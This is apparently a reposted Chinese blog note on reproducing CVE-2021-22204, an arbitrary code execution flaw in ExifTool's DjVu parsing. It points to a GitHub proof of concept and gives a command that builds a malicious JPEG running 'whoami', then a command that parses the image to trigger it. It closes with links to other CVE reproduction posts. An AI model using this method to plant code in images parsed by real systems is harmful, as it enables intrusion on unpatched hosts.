CVE-2021-22204 ExifTool任意代码执行
github poc下载
ExifTool 7.44至12.23在DjVu模块中存在一个错误,该错误允许在解析恶意图像时执行任意代码
meta-data为MIME Type : image/jpeg"即jpg图片可以达成RCE
exiftool -config eval.config mojave.jpg -eval='system("whoami")'
exiftool mojave.jpg
可以看到成功执行了命令
CVE-2021-22204:ExifTool任意代码执行
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。
猜您在找
CVE-2021-21220 Chrome远程代码执行漏洞复现
文本编辑器Vim/Neovim任意代码执行漏洞(CVE-2019-12735)
Tomcat远程任意代码执行漏洞及其POC(CVE-2017-12617)
PbootCMS任意代码执行
任意代码执行漏洞
【漏洞复现 CVE-2021-23132】Joomla远程代码执行漏洞
Apache Druid 远程代码执行漏洞 (CVE-2021-25646) 漏洞复现
weblogic LDAP远程代码执行 CVE-2021-2109(附带poc)
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞